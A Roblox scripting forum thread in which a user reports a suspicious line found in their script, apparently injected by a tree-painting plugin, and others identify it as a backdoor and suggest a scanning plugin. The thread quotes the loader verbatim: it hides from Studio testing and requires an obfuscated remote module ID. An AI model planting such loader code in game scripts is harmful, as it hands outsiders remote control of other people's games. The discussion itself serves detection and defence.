So i had an error in a script of mine that was working fine before and when i looked into it i found this at the bottom of the script:
spawn(function()game:WaitForChild('ServerScriptService')if game:GetService('Workspace').Terrain:FindFirstChild('CallF')then return end;if game:GetService('RunService'):IsStudio()then return end;require(math.sqrt(6.7743462758588e+18)).load(game.PlaceId)end)
The only new plugin i have is a model 'painter' so i can easily place trees in my map, I can only assume it has something to do with that but i thought id ask anyway just in case.
that is a backdoor 150% the "require" requires a module script (if im not incorrect)
(math.sqrt(6.7743462758588e+18)) i ran it and it came back with this: 2602757437
the reason i think it errored is that asset is " [ Content Deleted ] " you can view the original thing
Also the owner of it has been banned so it should stop all backdoors he added
I recommend THIS plugin to attempt to find backdoors / finds any scripts that have the word "require" and either A prints the script or B deletes the script Heres some pictures
Closed as off-topic by Elixcore, Vinceberget, Nowaha, and User#24403
This question has been closed by our community as being off-topic from ROBLOX Lua Scripting.
Why was this question closed?